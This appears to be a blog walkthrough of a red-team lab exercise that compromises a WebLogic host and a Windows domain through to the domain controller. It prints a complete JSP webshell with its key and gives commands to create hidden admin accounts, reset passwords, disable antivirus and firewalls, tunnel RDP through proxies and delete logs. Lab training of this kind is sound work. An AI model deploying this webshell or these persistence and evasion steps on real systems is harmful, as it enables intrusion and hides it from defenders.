Article directory
- 1. Network topology
- 2. Description
- Configuration Environment
- penetration begins
-
- collect message
- start attacking
- Kill the software
- CS is online
-
- Privilege escalation
- Intranet detection
- Lateral movement
- landscape again
- rdp connection
- trace removal
- Summarize:
1. Network topology
Network Configuration:
2. Description
The Red Team Combat Series mainly uses real enterprise environments as examples to build a series of shooting ranges and learn through exercises, video tutorials, and blogs. This red team environment mainly uses Access Token exploitation, WMI exploitation, domain vulnerability exploitation, SMB relay, EWS relay, PTT (PTC), MS14-068, GPP, SPN exploitation, gold bill/silver bill/Sid History/MOF and other attack and defense technologies. About the unified login password for the shooting range: 1qaz@WSX
- Bypass UAC
- Windows system NTLM acquisition (theoretical knowledge: Windows certification)
- Access Token application (MSSQL application)
- WMI utilization
- Web proxy, layer 2 proxy, special protocol proxy (DNS, ICMP)
- In-domain information collection
- Domain vulnerability exploitation: SMB relay, EWS relay, PTT (PTC), MS14-068, GPP, SPN exploitation
- Domain credential collection
- Backdoor technology (gold note/silver note/Sid History/MOF)
- Environmental Statement
Intranet segment: 10.10.10.1/24
DMZ network segment: 192.168.111.1/24
Test machine address: 192.168.111.1 (Windows), 192.168.111.11 (Linux)
Firewall policy (after the policy is set, the test machine can only access 192 addresses, simulating public network access):
deny all tcp ports: 10.10.10.1 allow all tcp ports: 10.10.10.0/24
- Configuration information
DC
IP: 10.10.10.10OS: Windows 2012(64)
Application: AD domain
WEB:
IP1: 10.10.10.80 IP2: 192.168.111.80OS: Windows 2008(64)
Application: Weblogic 10.3.6 MSSQL 2008
PC:
IP1: 10.10.10.111 IP2: 192.168.111.201 OS: Windows 7(32)
Attack aircraft:
IP: 192.168.111.1 OS: Windows 11(64)
IP: 192.168.111.128 OS: kaliLinux(64)
Configuration environment
Log in to the web host using de1ay user login password is 1qaz@WSX
The gateway address here is 1, which is the address of the host, so there is no external network here. If you want to change the external network to 2, it will be fine. If you want to use the internal network here, I will not change it.
Start weblogic: C:\Oracle\Middleware\user_projects\domains\base_domain
Use the administrator to enter administrator/1qaz@WSX
Enter your account and password again to start:
The internal network card is disabled by the firewall and segment 10 cannot be accessed from the external network:
Infiltration begins
Information collection
Target: 192.168.111.80 is the attack target as the boundary of the web
Main services: web, sql server, rdp, weblogic and smb
There are multiple vulnerabilities:
Start attack
Start playing directly:
Execute command: tasklist /svc
Antivirus software exists: 360
Will it kill you if you try to upload the shell? Do a normal anti-kill test first.
First get the path:
It seems to have been killed: I changed the tool and continued uploading.
Successfully uploaded the Ice Scorpion Horse:
<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super( c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST") ){String k="e45e329feb5d925b";/*This key is the first 16 digits of the 32-bit md5 value of the connection password. The default connection password is rebel*/session.putValue("u",k);Cipher c= Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g( c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%>
/This key is the first 16 digits of the 32-bit md5 value of the connection password. The default connection password is rebel/
Successfully got the shell:
Find the location:
Inject memory horse into stable shell:
Information collection: multiple network cards exist
Determine if a domain environment exists:
If 360 is detected above, we need to find a way to kill him.
Kill anti-virus software
1. Go up to 3389 and close it directly. You need to create an administrator user.
2. Elevate privileges to system shutdown
3. Avoid killing C2
Create user:
net user julien 1qaz@WSX /add net localgroup Administrators julien /add
The connection is reporting an error:
Log in as the administrator user and change the password directly if you don’t know the password:
net user Administrator 1qaz@WSX
Log in
Uninstall directly
Turn off the firewall and do whatever you want! !
cs online
Online cs horse:
Generate horse upload and run
Capture clear text passwords:
mssql also has a weak password and the username and password in the domain
Elevated privileges
Use ms14-058 to escalate privileges
Get system permissions:
Internal network detection
cs cannot detect
Try using fscan:
See 10.10.10.10
Online msf:
Upload run:
Do socks 4:
kali connection socks
192.168.111.201 detected:
cs arp detection:
192.168.111.2 and 128 are my hosts and kali omitted: smb online try horizontal
Lateral movement
Use smb beacon to go online:
Successfully launched:
Check if there is any anti-virus software:
And 360 more:
Youkai 3389: grab the password to log in to rdp
Check the administrator user:
Tried administrator and mssql login 3389: (failed)
Detect other hosts directly:
10.10.10.10 was detected earlier, so try it directly here:
Moving laterally again:
Horizontal again
Get permission:
rdp connection
Modify Administrator login 3389:
Laughing to death
Create user to continue:
Note that there will be a pop-up window like this:
Here is what I have logged in
After all the hard work, I finally got it and went to kill the software.
Turn off the firewall:
Go get 10 hosts again:
Also opened 3389
Here, because 10 hosts are on the internal network, the hosts cannot be connected directly and need to be connected through socks:
First check if there is any anti-virus software:
No:
Here use the command to turn off the firewall:
Because our host cannot directly access 10.10.10.10 (It is actually possible but pretends not to be possible) do socks5:
Shell tool connection uses proxy:
Then grab the account and password:
Why are they all empty and there is no password:
Create users directly and join groups:
net user julien 1qaz@WSX /add
net localgroup administrators julien /add
Direct shell tool connection:
The agent uses the above:
The proxy seems to be failing here:
Then just use kali’s rdp directly.
proxychains rdesktop -g 1440×900 -r disk:LinuxDisk=/root/Downloads -u julien -p “1qaz@WSX” 10.10.10.10:3389
Kali connection failed:
Try to find the problem on cs:
View port:
Check it with nmap:
If there is no problem, try connecting again:
Directly use the host that has been obtained to connect: Here, the 10 domain controllers connected to the windows 7 above are successfully obtained:
Passed successfully.
Trace removal
Don’t forget to delete multiple logs, especially weblogic logs. Users can be created using hidden methods. Creating shadow accounts will be used later and will not be shown here. Trace removal means returning to the original path. There are many tools you can use. Find it yourself. I won’t leave it here!
Summary:
Penetration testing can be carried out in many ways. This is just my favorite method. The intranet can also capture hashes and other uses, which will be used in the subsequent Red Sun Shooting Range series.